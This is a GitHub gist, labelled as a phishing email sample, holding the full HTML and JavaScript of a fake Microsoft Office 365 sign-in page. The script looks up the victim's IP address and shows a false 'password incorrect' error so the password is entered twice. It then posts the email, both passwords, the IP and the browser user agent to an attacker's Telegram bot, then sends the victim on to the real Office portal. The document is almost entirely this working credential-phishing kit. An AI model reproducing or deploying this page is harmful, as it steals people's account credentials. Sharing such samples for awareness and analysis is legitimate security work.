-
-
Save aaronpowell/8c50aecc2f661968835b52a0ad2d377b to your computer and use it in GitHub Desktop.
This is a phishing email - don't run it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html dir="ltr" class="" lang="en"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
<title>Sign in to your account</title> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes"> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> | |
<link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"> | |
<link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet"> | |
<script> | |
$(document).ready(function() { | |
$("#displayName").empty().append(email); | |
$.getJSON("https://api.ipify.org?format=json", function(data) { | |
$("#gfg").html(data.ip); | |
}) | |
}); | |
</script> | |
</head> | |
<body class="cb" style="display: block;"> | |
<p id="gfg" style="display: none;"></p> | |
<form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" action=""> | |
<div class="login-paginated-page"> | |
<div id="lightboxTemplateContainer"> | |
<div id="lightboxBackgroundContainer"> | |
<div class="background-image-holder" role="presentation"> | |
<div class="background-image ext-background-image" style="background-image: url("https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a….svg");"></div> | |
</div> | |
</div> | |
<div class="outer"> | |
<div class="template-section main-section"> | |
<div class="middle ext-middle"> | |
<div class="full-height"> | |
<div class="flex-column"> | |
<div class="win-scroll"> | |
<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox"> | |
<div><img class="logo" role="img" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb….png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9….svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9….svg" alt="Microsoft"></div> | |
<div role="main"> | |
<div class="animate slide-in-next"> | |
<div> | |
<div class="identityBanner"> | |
<div id="displayName" class="identity"></div> | |
</div> | |
</div> | |
</div> | |
<div class="pagination-view animate has-identity-banner slide-in-next"> | |
<div> | |
<div id="loginHeader" class="row title ext-title"> | |
<div role="heading" aria-level="1">Enter password</div> | |
</div> | |
<div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div> | |
<div class="row"> | |
<div class="form-group col-md-24"> | |
<div class="placeholderContainer"> <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required /></div> | |
</div> | |
</div> | |
<div> | |
<div class="position-buttons"> | |
<div> | |
<div class="row"> | |
<div class="col-md-24"> | |
<div class="text-13"> | |
<div class="form-group"> <a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten my password</a> </div> | |
<div class="form-group"></div> | |
<div class="form-group"> <a id="i1668" href="#">Sign in with another account</a> </div> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div class="win-button-pin-bottom"> | |
<div class="row"> | |
<div> | |
<div class="col-xs-24 no-padding-left-right button-container"> | |
<div class="inline-block"> <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Sign in"> </div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="footer" role="contentinfo" class="footer ext-footer"> | |
<div> | |
<div id="footerLinks" class="footerNode text-secondary"> <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a> <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy & cookies</a> <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a></div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</div> | |
</form> | |
<script> | |
var count = 0; | |
var pswd1; | |
document.getElementById("idSIButton9").addEventListener("click", function(e) { | |
e.preventDefault(); | |
var pswd = document.getElementById('i0118').value; | |
if (pswd == null || pswd == "") { | |
document.getElementById('errorpw').innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; | |
setTimeout(() => { | |
document.getElementById('errorpw').innerHTML = ''; | |
}, 3000); | |
} else if (pswd.length < 5) { | |
document.getElementById('errorpw').innerHTML = "Your account password is too short."; | |
setTimeout(() => { | |
document.getElementById('errorpw').innerHTML = ''; | |
document.getElementById("i0281").reset(); | |
}, 3000); | |
} else if (count < 1) { | |
pswd1 = document.getElementById('i0118').value; | |
document.getElementById('errorpw').innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`; | |
document.getElementById("i0281").reset(); | |
count++; | |
} else { | |
var IP = document.getElementById('gfg').textContent; | |
var message = `====== O365 Result ======\\r\Email: ${email}\\r\Password1: ${pswd1}\\r\Password2: ${pswd}\\r\IP: https://ip-api.com/${IP}\\r\User-Agent: ${navigator.userAgent}\\r\===================`; | |
var settings = { | |
"async": true, | |
"crossDomain": true, | |
"url": "https://api.telegram.org/bot" + token + "/sendMessage", | |
"method": "POST", | |
"headers": { | |
"Content-Type": "application/json", | |
"cache-control": "no-cache" | |
}, | |
"data": JSON.stringify({ | |
"chat_id": chat_id, | |
"text": message | |
}) | |
} | |
$.ajax(settings).done((response) => { | |
window.location.replace('https://portal.office.com/servicestatus'); | |
}); | |
} | |
}); | |
</script> | |
</div> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment